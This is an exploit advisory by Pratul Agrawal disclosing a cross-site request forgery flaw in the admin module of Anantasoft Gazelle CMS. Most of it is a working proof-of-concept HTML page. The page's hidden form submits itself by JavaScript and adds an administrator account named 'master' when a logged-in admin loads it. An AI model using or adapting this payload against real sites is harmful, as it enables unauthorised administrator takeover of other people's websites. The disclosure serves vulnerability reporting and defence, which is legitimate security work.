82 lines
No EOL
2.6 KiB
Text
82 lines
No EOL
2.6 KiB
Text
=======================================================================
|
|
|
|
Anantasoft Gazelle CMS CSRF Vulnerability
|
|
|
|
=======================================================================
|
|
|
|
by
|
|
|
|
Pratul Agrawal
|
|
|
|
|
|
|
|
# Vulnerability found in- Admin module
|
|
|
|
# email Pratulag@yahoo.com
|
|
|
|
# company aksitservices
|
|
|
|
# Credit by Pratul Agrawal
|
|
|
|
# Software Anantasoft_Gazelle_CMS
|
|
|
|
# Category CMS / Portals
|
|
|
|
# Plateform php
|
|
|
|
|
|
|
|
# Proof of concept #
|
|
|
|
Targeted URL: http://server/demo/2/193/Anantasoft_Gazelle_CMS
|
|
|
|
|
|
Script to Add the Admin user through Cross Site request forgery
|
|
|
|
. ................................................................................................................
|
|
|
|
<html>
|
|
|
|
<body>
|
|
|
|
<form name="XYZ" action="http://site/gazelle/admin/index.php?Users/Add%20User" method="post">
|
|
|
|
<input type=hidden name="name" value="master">
|
|
|
|
<input type=hidden name="pass" value="master">
|
|
|
|
<input type=hidden name="controle" value="master">
|
|
|
|
<input type=hidden name="email" value="master%40yahoo.com">
|
|
|
|
<input type=hidden name="active" value="on">
|
|
|
|
<input type=hidden name="showemail" value="on">
|
|
|
|
<input type=hidden name="admin%5B%5D" value="2">
|
|
|
|
<input type=hidden name="save" value="Add">
|
|
|
|
<input type=hidden name="table" value="users">
|
|
|
|
<input type=hidden name="joindate" value="2010-03-10+04%3A04%3A36">
|
|
</form>
|
|
|
|
<script>
|
|
|
|
document.XYZ.submit();
|
|
|
|
</script>
|
|
|
|
</body>
|
|
|
|
</html>
|
|
|
|
. ..................................................................................................................
|
|
|
|
|
|
|
|
After execution refresh the page and u can see that user having giving name Added automatically with Admin Privilege.
|
|
|
|
|
|
#If you have any questions, comments, or concerns, feel free to contact me. |